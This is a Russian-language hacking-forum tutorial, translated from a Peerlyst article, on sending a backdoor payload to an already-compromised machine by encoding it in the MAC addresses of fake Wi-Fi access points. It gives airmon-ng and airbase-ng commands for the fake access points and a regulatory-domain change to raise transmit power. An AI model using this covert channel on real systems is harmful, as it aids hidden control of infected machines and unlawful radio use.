Передаём пейлоад по wi-fi
@webware
Привет любимый codeby, с вами Ghost Pants и сегодня мы поговорим о загрузке пейлоада через wi-fi. Данная статья является переводом с внесением корректив вот этой статьи Peerlyst.
Итак, у нас есть backdoor payload не шифрованный и без всяких прочих приблуд способных защитить нас от обнаружения. В данной схеме атакующий проводит атаку с помощью смены своего BSSID, это означает что вы сможете сменить свой BSSID и инфицировать свою цель шаг за шагом.
На заметку: вы можете использовать MANA-Toolkit или что-нибудь подобное https://github.com/sensepost/mana
Приступаем, допустим у нас есть пейлоад “fec8b00011ddc00945f1”
- Шаг 1 *звук гонга*: нам нужно сделать фейковую точку доступа с которую мы назовём "Фейк" (да да, мы будем максимально оригинальны) и мак адрес у неё будет
00:fe:c8:b0:00:11
- Мак адрес 00:fe:c8:b0:00:11 это наш загружаемый пейлоад т.к. название нашего пейлоада “fec8b00011ddc00945f1”
-Это секция пейлоада “fec8b00011ddc00945f1”
- Шаг 2 *ту ту*: система с беком сканит ESSID нашего фейка и дампит BSSID для неё
-Наш код должен сделать так: fe:c8:b0:00:11 ==> fec8b00011
- Шаг 3 *кря*: атакующая система создаёт фейковую точку доступа с именем "Фейк" и маком
00:dd:c0:09:45:f1
-Мак-адрес 00:dd:c0:09:45:f1 это наш инжектируемый пейлоад “ddc00945f1”
-Это секция пейлоада “fec8b00011ddc00945f1”
- Шаг 4 *вы что-нибудь слышите?*:система с бекдором должна дампить данную секцию BSSID или мак
dd:c0:09:45:f1 ==> [B]ddc00945f1[/B]
После данных шагов со сканом мы имеем пейлоад fec8b00011ddc00945f1 в инфицированной системе. Теперь, разобравшись как работает данный метод мы рассмотрим команды для создания фейк AP.
ifconfig wlan0 down iw reg set BO ifconfig wlan0 up iwconfig wlan0 txpower 30
с помощью этих команд мы увеличиваем мощность нашей AP
Примечание: эти команды нужно писать до создания wlan0mon для вашего wlan0. Создания монитора для wlan карты это обязательный шаг для создания фейковой AP. Делаем монитор этой командой: "airmon-ng start wlan0", если не работает, то используйте команду iwconfig и посмотрите название своего адаптера.
Дальше пойдут команды с кратким описанием:
airmon-ng start wlan0- запускаем интерфейсairbase-ng -a 00:fe:c8:b0:00:11 –essid “Fake” -I 10 -0 wlan0mon- делаем первый кусок пейлоадаsleep 15- дайте точке поспать 15 секундkillall airbase-ng- если у точки бессонницаairbase-ng -a 00:dd:c0:09:45:f1 –essid “Fake” -I 10 -0 wlan0mon- второй кусок пейлоадаsleep 15- дайте точке поспать 15 секундkillall airbase-ng- если у точки бессонница
Итак, надеюсь всё заработало, если нет напишу в комментах как решить ту или иную ошибку.